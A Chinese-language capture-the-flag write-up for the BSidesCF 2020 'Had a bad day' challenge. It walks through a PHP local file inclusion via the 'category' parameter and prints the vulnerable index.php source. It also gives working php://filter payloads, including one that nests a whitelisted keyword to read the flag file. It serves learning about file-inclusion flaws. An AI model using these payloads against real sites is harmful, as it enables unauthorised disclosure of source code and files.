文件包含伪协议套协议
来自:
[BSidesCF 2020]Had a bad day
打开网页,可点两个按钮,点了点就是几个图片:
这里注意到网址有个category传参,应该是get传的,打开源码:
这里有点抽象,但是注意name=category,method=get,而且有src,估计是文件包含漏洞。
那就用经典filter协议:
?category=php://filter/convert.base64-encode/resource=index.php
注意这个payload,前面传参根据实际而定,大多数是file=php://....但是此处传的参是category,不要乱用了哦~~
虽然传上去寄了,但是这个回显足以说明方向是正确的。
本来这里已经断思路了,不得不去看wp,不知道怎么猜的是后缀名截断.....可能是从传的参只有文件名字但没有后缀猜的吧....
但是后面我仔细看一下报错信息:
两个php?
那就明白了,确实.php是代码添加上去的,我们只需要给文件名。
那payload删一下结尾的.php:
?category=php://filter/convert.base64-encode/resource=index
有回显,直接查看源码然后转码赋值看一下:(看来报错信息真的需要仔细看啊~~)
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="Images that spark joy">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
<title>Had a bad day?</title>
<link rel="stylesheet" href="css/material.min.css">
<link rel="stylesheet" href="css/style.css">
</head>
<body>
<div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
<header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800">
<div class="mdl-layout__header-row">
<span class="mdl-layout-title">Had a bad day?</span>
<div class="mdl-layout-spacer"></div>
<div>
</header>
<div class="page-ribbon"></div>
<main class="page-main mdl-layout__content">
<div class="page-container mdl-grid">
<div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
<div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col">
<div class="page-crumbs mdl-color-text--grey-500">
</div>
<h3>Cheer up!</h3>
<p>
Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
</p>
<div class="page-include">
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
</div>
<form action="index.php" method="get" id="choice">
<center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
<button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
</form>
</div>
</div>
</main>
</div>
<script src="js/material.min.js"></script>
</body>
</html>
看起来很长,但主要中间一部分才是关键:
<?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($file . '.php'); } else{ echo "Sorry, we currently only support woofers and meowers."; } }
?>
意思就是传的这个参里面有woofers/meowers/index三选一就行了,这里就是php伪协议可以套个东西且不影响的知识:、
payload:
?category=php://filter/convert.base64-encode/index/resource=flag
直接传:
base64转码就是flag:
